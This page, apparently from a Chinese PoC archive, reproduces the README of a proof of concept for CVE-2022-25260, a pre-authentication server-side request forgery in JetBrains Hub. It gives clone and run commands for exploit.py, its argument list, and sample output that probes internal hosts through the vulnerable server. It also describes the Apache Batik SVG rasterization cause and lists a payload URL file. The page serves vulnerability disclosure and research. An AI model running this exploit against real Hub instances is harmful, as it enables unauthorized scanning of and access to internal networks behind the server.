关联漏洞
标题:
JetBrains Hub 代码问题漏洞
(CVE-2022-25260)
描述:JetBrains Hub是捷克JetBrains公司的一款基于Web的应用程序。该程序能够将多种JetBrains团队工具集成到一起。 JetBrains Hub 2021.1.14276之前版本存在代码问题漏洞,该漏洞源于软件缺少对于请求伪造的验证,很容易受到服务器端请求伪造(SSRF)的攻击。
描述
PoC for CVE-2022-25260: pre-auth semi-blind SSRF in JetBrains Hub
介绍
# CVE-2022-25260
JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF)
## Requirements
- JetBrains Hub <2021.1.14276
- JetBrains Hub before 2021.1.14276 was vulneable to improper access control (CVE-2022-34894), which allows an attacker create untrusted services without authentication even if guest user is disabled. This makes it possible to exploit the vulnerablity without any other requirements (normally an attacker should be at least authenticated)
## Usage
Install & run:
```powershell
$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h
|--------------------------------------------------------------------|
| CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF |
| developed by Yurii Sanin (Twitter: @SaninYurii) |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]
optional arguments:
-h, --help show this help message and exit
-hub_url HUB_URL Target Hub instance
-email EMAIL Email address of any user in the system
-internal_urls_file INTERNAL_URLS_FILE
Path to internal service URLs file
-internal_url INTERNAL_URL
Internal service URL
```
Usage:
```powershell
$ python3 exploit.py hub_url http://localhost:8080 -email hello@0d.tf -internal_urls_file ./assets/payloads/urls.txt
|--------------------------------------------------------------------|
| CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF |
| developed by Yurii Sanin (Twitter: @SaninYurii) |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.
```
**DEMO:**
## How does it work?
The vulnerability was possible due to use of Apache Batik with default settings for user-supplied SVG icon rasterization. You can find more information about exploting server-side SVG rasterization [HERE](https://github.com/yuriisanin/svg2raster-cheatsheet).
## Support
You can follow me on [Twitter](https://twitter.com/SaninYurii), [GitHub](https://github.com/yuriisanin) or [YouTube](https://www.youtube.com/channel/UCLN2EvGxtnucEdrI21PmJZg).
文件快照
[4.0K] /data/pocs/f0fa69151d664d1e2e429931f3cacb8e41cbd1d6
├── [4.0K] assets
│ ├── [4.0K] images
│ │ └── [583K] cve-2022-25260.gif
│ └── [4.0K] payloads
│ └── [ 276] urls.txt
├── [8.3K] exploit.py
└── [3.1K] README.md
3 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。